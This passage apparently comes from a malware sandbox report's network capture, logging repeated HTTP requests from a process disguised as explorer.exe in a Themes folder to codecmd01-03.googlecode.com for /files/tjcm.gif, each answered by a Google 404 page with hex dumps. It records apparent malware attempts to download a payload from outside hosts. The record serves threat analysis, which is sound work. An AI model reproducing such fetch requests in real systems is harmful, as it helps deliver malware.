                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:19.913403034 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      72192.168.2.54978674.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:20.912934065 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:21.571877003 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:21 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:21.572043896 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      73192.168.2.549787108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:22.069940090 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:22.768496990 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:22 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:22.768583059 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      74192.168.2.549788108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:23.392731905 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:24.111991882 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:24 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:24.112011909 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      75192.168.2.54978974.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:24.506943941 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:25.204130888 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:25 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:25.204158068 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      76192.168.2.549790108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:25.601396084 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:26.287468910 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:26 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:26.287492037 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      77192.168.2.549791108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:26.738575935 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:27.408235073 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:27 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:27.408560991 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      78192.168.2.54979274.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:28.371062040 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:29.065859079 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:28 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
